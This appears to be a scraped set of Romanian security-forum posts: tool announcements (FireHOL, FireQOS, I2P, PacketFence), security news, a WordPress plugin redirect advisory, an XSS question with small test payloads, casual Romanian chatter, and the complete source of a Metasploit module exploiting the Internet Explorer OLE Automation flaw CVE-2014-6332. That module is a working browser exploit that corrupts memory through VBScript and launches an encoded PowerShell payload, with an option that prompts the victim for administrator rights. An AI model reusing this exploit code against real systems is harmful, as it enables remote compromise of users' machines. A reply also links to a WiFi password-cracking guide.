Aerosol

What are FireHOL and FireQOS? FireHOL is a language (and a program to run it) which builds secure, stateful firewalls from easy to understand, human-readable configurations. The configurations stay readable even for very complex setups. FireQOS is a program which sets up traffic shaping from an easy-to-understand and flexible configuration file. Both programs abstract away the differences between IPv4 and IPv6. so you can concentrate on the rules you want. You can apply rules for IPv4 or IPv6, or both, as you need. We think the best advert for these programs are their configurations. See below for: a FireHOL example and more information a FireQOS example and more information The two programs are shipped together but work independently so you can choose to use one or both. Philosophy Make firewalling and traffic shaping an easy, straightforward task for everyone from end users to experienced administrators. Be as secure as possible by allowing explicitly only the wanted traffic to flow. Be a resource of knowledge around services and their peculiarities. Be flexible enough for any firewalling or traffic-shaping need. Be simple to install on any modern Linux system FireHOL FireHOL is an iptables firewall generator producing stateful iptables packet filtering firewalls, on Linux hosts and routers with any number of network interfaces, any number of routes, any number of services served, any number of complexity between variations of the services (including positive and negative expressions). Writing a complete, safe, firewall, suitable for protecting a host and a network can be this easy: interface eth0 mylan policy accept interface ppp+ internet server smtp accept server http accept server ftp accept server ssh accept src example.firehol.org client all accept router mylan2internet inface eth0 outface ppp+ masquerade route all accept Jump straight to the tutorials to learn how to configure your own. Hopefully you have noticed that all the rules given match just one direction of the traffic: the request. They don't say anything about replies. This is because FireHOL handles the replies automatically. You don't have to do anything about them: if a request is allowed, then the corresponding reply is also allowed. This also means that FireHOL produces the iptables statements to exactly match what is allowed in both directions and nothing more. FireHOL is a language to express firewalling rules, not just a script that produces some kind of a firewall. Is it secure? FireHOL is secure because it has been designed with the right firewalling concept: deny everything, then allow only what is needed. Also, FireHOL produces stateful iptables packet filtering firewalls (and possibly, the only generic tool today that does that for all services in both directions of the firewall). Stateful means that traffic allowed to pass is part of a valid connection that has been initiated the right way. Stateful also means that you can have control based on who initiated the traffic. For example: you can choose to be able to ping anyone on the internet, but no one to be able to ping you. If for example you don't need to run a server on your Linux host, you can easily achieve a situation where you are able to do anything to anyone, but as far as the rest of world is concerned, you do not exist! Learn another language? FireHOL has been designed to allow you configure your firewall the same way you think of it. Its language is extremely simple. Basically you have to learn four commands: interface, to setup a firewall on a network interface router, to setup a firewall on traffic routed from one network interface to another server, to setup a listening service within an interface or router. The same command can be used as route within routers client, to setup a service client within an interface or router Commands client and server have exactly the same syntax. A FireHOL interface has two mandatory arguments and a router has only one (and this is the same as one of the two that interface requires). All of the optional parameters are the same to all of them. This sounds like just one command is to be learned... Of course there are a few more commands defined, but all of them exist just to give you finer control on these four. If you don't believe it is simple, consider this example. Why? As an IT executive, responsible for many dozens of Linux systems, I needed a firewalling solution that would allow me and my team to have a clear and simple view of what is happening on each server, as far as firewalling is concerned. I also needed a solution that will allow my team members to produce high quality and homogeneous firewalls independently of their security skills and knowledge. After searching for such a tool, I quickly concluded that no tool is flexible, open, easy, and simple enough for what I needed. I decided to write FireHOL in a way that will allow me, or anyone else, to view, verify and audit the firewall of any Linux server or Linux router in seconds. FireHOL's configuration is extremely simple... you don't have to be an expert to design a complicated but secure firewall. What features does it have? FireHOL handles firewalls protecting one host on all its interfaces and any combination of stateful firewalls routing traffic from one interface to another. There are no limitations on the number of interfaces or on the number of routing routes (except the ones iptables has, if any). FireHOL, still lacks a few features: QoS for example is not supported directly. You are welcome to extend FireHOL and send me your patches to integrate within FireHOL. In any case however, you can embed normal iptables commands in a FireHOL configuration to do whatever iptables supports. Since FireHOL produces stateful commands, for every supported service it needs to know the flow of requests and replies. Today FireHOL supports the following services: Many single socket protocols, such as HTTP, NNTP, SMTP, POP3, IMAP4, RADIUS, SSH, LDAP, MySQL, Telnet, NTP, DNS, etc. There are a few dozens of such services defined in FireHOL. Check this list. Even if something is missing, you can define it. Many complex protocols, such as FTP, NFS, SAMBA, PPTP, etc. If you need some complex protocol that is not present, you will have to program it (in simple Bash scripting - there are many commented examples on how this is done). Again, you will just create one Bash function with the rules of the protocol, and FireHOL will turn it to a client, a server or a router. FireQOS FireQOS is a traffic shaping helper. It has a very simple shell scripting language to express traffic shaping. You run FireQOS to setup the kernel commands. You can also run it to get status information or dump the traffic of a class. FireQOS is not a daemon and does not need to run always to apply traffic shaping. Configuring a complete, functional, traffic shaping setup can be this easy: # incoming traffic from my ADSL router interface eth0 adsl-in input rate 10500kbit adsl remote pppoe-llc class voip commit 100kbit pfifo match udp ports 5060,10000:10100 # asterisk sip and rtp match udp ports 16393:16402 # apple facetime class realtime commit 10% match tcp port 22,1195:1198,1753 # ssh, openvpn, pptp match udp port 53 # dns match proto GRE match icmp match tcp syn match tcp ack class clients commit 10% match tcp port 20,21,25,80,143,443,465,873,993 # mail, web, ftp, etc class default max 90% # unmatched traffic goes here ('default' is special) # torrents below the default class, because I want them to slow down when # the default class needs bandwidth class torrents max 90% match port 51414 # my torrent client # outgoing traffic to my ADSL router interface eth0 adsl-out output rate 800kbit adsl remote pppoe-llc class voip commit 100kbit pfifo match udp ports 5060,10000:10100 # asterisk sip and rtp match udp ports 16393:16402 # apple facetime class realtime commit 10% match tcp port 22,1195:1198,1753 # ssh, openvpn, pptp match udp port 53 # dns match proto GRE match icmp match tcp syn match tcp ack class clients commit 10% match tcp port 20,21,25,80,143,443,465,873,993 # mail, web, ftp, etc class default max 90% # unmatched traffic goes here ('default' is special) # torrents below the default class, because I want them to slow down when # the default class needs bandwidth class torrents max 90% match port 51414 # my torrent client Jump straight to the tutorials to learn how to configure your own. FireQOS also allows you to monitor the live status of traffic: # ./sbin/fireqos.in status adsl-in FireQOS v1.0 DEVELOPMENT (C) 2013 Costa Tsaousis, GPL adsl-in: eth0 input => ifb0, type: adsl, overhead: 26 Rate: 10500Kbit/s, min: 105Kbit/s, R2Q: 8 (min rate 105Kbit/s) Values in Kbit/s CLASS voip realtim clients torrent default PRIORIT 1 2 3 5 4 COMMIT 105 1050 1050 105 105 MAX 10500 10500 10500 9450 9450 adsl-in (eth0 input => ifb0) - values in Kbit/s TOTAL voip realtim clients torrent default 46 - 7 - 39 - 50 - 5 - 42 3 80 - 9 - 60 11 75 - 6 - 65 4 103 19 3 - 79 2 56 - 3 - 50 3 84 - 5 - 70 9 FireQOS applies traffic shaping on the output of any interface. FireQOS applies traffic shaping on the input of any interface. Shaping incoming traffic is classfull, i.e. you have all the control available, similar to outgoing traffic. This is accomplished by setting up IFB devices. FireQOS handles everything about IFB devices. Any kernel that supports them will do. FireQOS supports overheads calculation. This means it can perfectly shape incoming and outgoing traffic on a linux box behind an ADSL router, or on a linux box with an ADSL modem attached. ATM overheads will be calculated based on the DSL encapsulation. FireQOS supports both IPv4 and IPv6. Each interface can be defined as ipv4, ipv6 or both (ipv4 and ipv6 in parallel). FireQOS supports nested classes. Nested classes can either be direct (child classes are directly attached to their parent class), or hardware emulation (child classes are attached to a qdisc with linklayer parameters and overheads calculation, which is attached to a parent class). FireQOS calculates port range masks (you just give a port range, FireQOS finds the optimal combination of tc statements to accomplish the match). Virtually any number of interfaces, any number of classes and any number of classification rules can be configured (the way it is organized it can configure up to 5000 classes per interface). It classifies packets using tc (both ipv4 and ipv6), but you can also use iptables CLASSIFY targets, or MARKs. HTB is used for all classes. FireQOS allows you to tcpdump the traffic of any leaf class. This allows you to examine the traffic you have assigned to classes. Download Install

The Invisible Internet Project (I2P) I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys). More to: https://geti2p.net/en/about/intro Download: https://geti2p.net/en/download

Webfwlog is a Web-based firewall log reporting and analysis tool. It allows users to design reports to use on logged firewall data in whatever configuration they desire. Included are sample reports as a starting point. Reports can be sorted with a single click, or "drilled-down" all the way to the packet level, and saved for later use. Supported log formats are netfilter, ipfilter, ipfw, ipchains, and Windows XP. Netfilter support includes ulogd MySQL or PostgreSQL database logs using the iptables ULOG target. Changes: Fixed issues compiling under cygwin. Various configuration changes made. Download

Hesperbot Scanner is a windows binary that is able to detect the Hesperbot banking trojan by fingerprinting memory and looking for things that traditional antivirus software fails to catch early during the malware campaigns. Download

PacketFence is a fully supported, trusted, Free and Open Source network access control (NAC) solution. Boasting an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1X support, layer-2 isolation of problematic devices, integration with the Snort IDS and the Nessus vulnerability scanner; PacketFence can be used to effectively secure networks - from small to very large heterogeneous networks. Changes: This is a minor release with new features, enhancements and important bug fixes. This release is considered ready for production use and upgrading from 4.5.0 is advised. Mai multe aici:PacketFence: Overview Download SHA1 sum: ebf432c4b76b3d7ff6cc61bf003bf72a5a8d5840

Capstone is a multi-architecture, multi-platform disassembly framework. It has a simple and lightweight architecture-neutral API, thread-safe by design, provides details on disassembled instruction, and more. Changes: This release isa stable version with major changes on the core and bindings. Download

Multam @io.kent vin si eu cu un mic update Update: Maligno 1.4 Changes: Code housekeeping. Better organization with /libs. Improved data validation (config and profiles), error detection and error description. Various updates and improvements. Download

@Casper00 nu o sa iti dea nimeni mura in gura, cauta pe forum si o sa gasesti uite https://rstforums.com/forum/63834-cum-se-sparg-parolele-wifi-wep-wpa-wpa2-manual-pentru-incepatori.rst aici un inceput! ( ai nevoie de Linux) si vezi ca aici nu e categoria cereri/ajutor asa ca inceteaza cu off-topicul.

Link-ul merge doar ca nu e un link de download de acolo poti sa Cumperi cartea. oricum ce e cu voi fratilor nu puteti vorbi cu o femeie, nu puteti saruta o femeie fara instructiuni?

@Casper00 nu, nu o poti afla daca ai fost conectat la retea cand nu aveau parola si apoi au adaugat...

Cyberthieves who used stolen credit cards to buy airline tickets have been targeted in a series of raids. Europol co-ordinated the raids at airports, targeting people who were trying to travel using a fraudulently bought ticket. In total, 118 people were arrested at 80 airports in 45 countries during the raids. Airlines lose more than $1bn (£640m) a year to the trade in fraudulent tickets, said Europol. Europol said the raids marked the start of an initiative called Global Airport Action, which will build on the links forged between police forces, airlines and credit card companies in preparation for the raids. These links helped to spot when tickets bought with stolen cards were being used to check in at an airport during the two days of the action. Police officers then swooped on the individuals using the tickets. Command centres in The Hague, Singapore and Bogota helped to direct the checking of tickets and travel documents as well as identifying individuals arrested. Some of those arrested were already known to police and had been arrested before for trading in tickets. In a statement, Europol said the stolen credit cards also helped organised crime groups keep operating and to facilitate the drug trade and human trafficking.

Following the last week's massive hack attack on Sony Pictures' network by a group calling themselves "#GOP," or Guardians of Peace, high-quality versions of several of the studio's newest films have hit piracy websites. It seems like matters for Sony Pictures is getting worse with time. Sony Pictures Entertainment has reportedly begun investigating links to North Korea of the possible cyberattack occurred last week that made the studio’s internal email systems offline, which was still offline at the time of writing. Now its five movie screeners – Annie, Fury, Still Alice, Mr. Turner and To Write Love on Her Arms – have made their way onto torrent file-sharing websites, though it has not been confirmed that the leak of all the films came from the same breach. "Still Alice" starring Julianne Moore, Alec Baldwin – US release date: Jan 16, 2015 "Mr Turner" starring Timothy Spall. – US release date: Dec 19, 2014 "Annie" starring Jamie Foxx and Cameron Diaz. – US release date: Dec 19, 2014 "Fury" starring Brad Pitt – US release date: Oct 17, 2014 "To Write Love on Her Arms" – US release date: March 2015 Except Fury, which was released in October, the other four movies have yet to hit the big screen, TorrentFreak reports. Previously it was reported that the hackers group #GOP compromised one of Sony Pictures’ servers, which caused all computers used by the studio to go down. An image with the words "Hacked by #GOP" threatened the company with a list of unspecified demands and warned the company that it would release sensitive data if the movie studio didn't cooperate. So, it appears that this leak could be the first of such leaks. Last week, Sony Pictures information-technology departments had instructed their staff to disconnect their computers and personal devices from the company's network, following the massive cyberattack. By Friday, it was believed that the staff at the company were forced to do their work with pen and paper and that it could take up to three weeks to completely get out of the massive breach. Sony could not immediately be reached for comment but told Variety it was working with law enforcement officials to investigate the massive cyberattack. "The theft of Sony Pictures Entertainment content is a criminal matter, and we are working closely with law enforcement to address it," a Sony spokeswoman said in a statement. Source

@Htich bune treaba dar mai bine criptai parola sa nu apara tot felul de copii

Bine ai venit.

Bre nu ai inteles esentialul, copii sunt fericiti ca nu se duc la scoala On:// La multi ani romania pentru a doua oara

<http://tetraph.com/security/open-redirect/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/#respond> *CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege Escalation* Exploit Title: WordPress Ad-Manager Plugin Dest Redirect Privilege Escalation Vulnerability Product: WordPress Ad-Manager Plugin Vendor: CodeCanyon Vulnerable Versions: 1.1.2 Tested Version: 1.1.2 Advisory Publication: Nov 25, 2014 Latest Update: Nov 25, 2014 Vulnerability Type: URL Redirection to Untrusted Site [CWE-601] CVE Reference: CVE-2014-8754 CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend) Impact Subscore: 4.9 Exploitability Subscore: 8.6 Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore] *Advisory Details* *(1) Product:* “WordPress Ad-Manager offers users a simple solution to implement advertising into their posts, their blog or any other WordPress page. Users can use pictures and images or HTML snippets like Google AdSense to incorporate advertising in an easy way.” *(2) Vulnerability Details:* The Dest Redirect Privilege Escalation vulnerability occurs at “track-click.php” page with “&out” parameter. *References:* http://tetraph.com/security/cves/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/ http://codecanyon.net/item/wordpress-admanager/544421 https://wordpress.org/plugins/ad-manager-for-wp/ http://cwe.mitre.org http://cve.mitre.org/ Source

Hello everyone, I found some weird HTML code injection in an IIS error message. IIS spits out some part of the user input that generated the error message, but will only display 20 characters at most. My question is: is it possible to actually exploit an XSS with this ? Here is an example: HTTP Request: mypage?search=%3cb%20onclick%3dalert(1)>%3e HTTP Response (real): <p>An error has occured.</p> <p>Exception HttpRequestValidationException occurred while attempting <b>mypage</b></p> <p>Exception message is: <b>A potentially dangerous Request.QueryString value was detected from the client (search="<b onclick=alert(1)>...").</b></p> <p>Stack trace:</p> <pre> Server stack trace: [..] My payload was: <b onclick=alert(1)>> and it works (after clicking). However, can this actually be exploited in real life ? I tried stuff in 20 characters like: <embed src=http://x> or <img src=http://x/z> but no luck. Has anyone ever tried this before ? Thanks, P.S. This might be a silly question with an obvious answer. If so, I'd be grateful to have some extra information (links, docs etc.). Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Powershell autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "3.0", :ua_maxver => "10.0", :javascript => true, :os_name => OperatingSystems::Match::WINDOWS, :rank => ExcellentRanking }) def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", 'Description' => %q{ This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332. The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10. Powershell is required on the target machine. On Internet Explorer versions using Protected Mode, the user has to manually allow powershell.exe to execute in order to be compromised. }, 'License' => MSF_LICENSE, 'Author' => [ 'Robert Freeman', # IBM X-Force 'yuange', # twitter.com/yuange75 'Rik van Duijn', # twitter.com/rikvduijn 'Wesley Neelen', # security[at]forsec.nl 'GradiusX <francescomifsud[at]gmail.com>', 'b33f', # @FuzZySec ], 'References' => [ [ 'CVE', '2014-6332' ], [ 'MSB', 'MS14-064' ], [ 'OSVDB', '114533' ], [ 'EDB', '35229' ], [ 'EDB', '35308' ], [ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ], [ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], ], 'BrowserRequirements' => { :source => /script|headers/i, :ua_name => HttpClients::IE, :os_name => /win/i, :arch => 'x86', :ua_ver => lambda { |ver| ver.to_i.between?(4, 10) } }, 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, 'Payload' => { 'BadChars' => "\x00" }, 'Privileged' => false, 'DisclosureDate' => "Nov 13 2014", 'DefaultTarget' => 0)) register_options( [ OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]), ], self.class ) end def vbs_prepare() code = %Q| dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() neline function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runaaaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function | end def get_html() if datastore['TRYUAC'] tryuac = 'runas' else tryuac = 'open' end payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true }) payl.slice! "powershell.exe " prep = vbs_prepare() html = %Q| <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <script language="VBScript"> function runaaaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0 end function </script> <script language="VBScript"> #{prep} </script> </body> </html> | end def on_request_exploit(cli, request, target_info) print_status("Requesting: #{request.uri}") send_exploit_html(cli, get_html()) end end Source

THE ELECTRONIC FREEDOM FOUNDATION has announced a worldwide coalition of organisations dedicated to the fight for net neutrality. The Global Net Neutrality Coalition defines the term thus: "Net neutrality requires that the internet be maintained as an open platform, on which network providers treat all content, applications and services equally, without discrimination." Comprising 25 organisations from 19 countries, the coalition will use its site as a repository for information regarding net neutrality laws and legislation in given territories, along with advice on petitioning the relevant authorities to preserve an equal internet for all. The announcement is clear that it does not want to prevent internet service providers using techniques to ensure smooth traffic, for example preventing DDoS attacks or offering different packages to consumers. But it does insist that tiering should not be used "as a pretext to police communications on their networks, to bestow unfair commercial advantages on their own or particular third-party content, or to create a walled garden where only certain applications, services or protocols are welcome". Net neutrality is most recognised as a hot button topic in the US, where the Federal Communications Commission (FCC) is currently deliberating on whether to deregulate the internet to allow 'fast' and 'slow' lanes. A decision in favour of doing so would go against the wishes of over three million commenters who told the FCC that they did not want to see this happen, and President Obama, who publicly came out as a supporter of net neutrality, appealing to the FCC to reclassify broadband as a public utility, thus tightening controls over it. The issue is relevant around the world, however. Only Brazil and The Netherlands have so far ratified legislation to ensure net neutrality, but the European Union came out squarely in favour of preserving an open internet earlier this year. However, it has emerged in recent weeks that key stakeholders in the EU have been making overtures about doing exactly the opposite, with plans to open fast lanes for businesses across Europe as part of proposals by the Italian presidency. EU digital commissioner Günther Oettinger said last week that it was more important to ensure rural broadband availability than to preserve net neutrality, suggesting that broadband providers ought to be able to "reap the benefits" of supplying less financially viable locations. Source

Some of the world's best threat detection platforms have been bypassed by custom malware in a demonstration of the fallibility of single defence security. Five un-named top advanced threat detection products were tested against four custom malware samples written by researchers at Crysys Lab, Hungary. The most capable of the malware samples, dubbed BAB0 (or 'Hobbit' in the researchers' native tongue), slipped past each product having infected through image steganography, a feat within the capabilities of savvy criminals. "It was designed to be as stealthy as possible, and utilises multiple methods to avoid detection," the lab's seven researchers wrote in a paper titled An independent test of APT attack detection appliances. "Actually, this test case simulates attackers with moderate resources and some understanding of the state-of-the-art detection tools and how advanced malware work. "For example, this can simulate organised criminals when attacking high value targets." BAB0 was written in C++ with a server side in PHP and never appeared in the clear in net traffic due to the use of steganography. Scripts pulled the executable from the image after users clicked. The malware then ducked sandboxes with obfuscated HTML and JavaScript code. A decoy program was presented to the victim while the hobbit scurried off hiding command and control traffic in HTML traffic appearing as user clicks. Command types sent to BAB0 included directory traversal, file transfer, and command execution. Another less sophisticated malware offering bypassed three of the unnamed platforms while the basic offerings were caught by all five. "The main message of this work is that novel anti-APT tools can be bypassed with moderate effort," the report read. "If we were able to develop samples that were not detected by these tools without actually having access to any of the tested products during the development phase, then resourceful attackers who may be able to buy these products will also be able to develop similar samples, or even better ones." Much lazier attackers could hang out for BAB0 to be published at later date, a move designed to help bolster security technology in interested companies. The researchers were now pondering a testing framework for zero-day browser exploits. Source

@io.kent sa ne traiesti bre

La Multi ani Romania

Frate nu trebuie confundat anti-malware cu anti-virusul documenteaza-te si dupa vino aici sa comentezi daca nu stii taci... nu are rost sa imi bat capu cu tine.

@Apeiron pune frate kali linux merge perfect si pe 512mb RAM windows-ul e un mare rahat si daca ai 1GB RAM merge pus windows 7 asa ca nu esti obligat sa folosesti windows xp.

Daca si MalwareBytes e anti-virus eu imi dau foc... ATENTIE pentru toti MalwareBytes este ANTI-MALWARE nu anti-virus el merge folosit in paralel cu un anti-virus.. Adobe Flash Player Anti-virus (poti sa iti pui pe langa el si un anti-malware + firewall) Winamp (sau ce folosesti tu pentru a asculta muzica) Browser (Chrome / Mozilla) WinRAR cam asta sunt acum depinde de ce ai tu nevoie...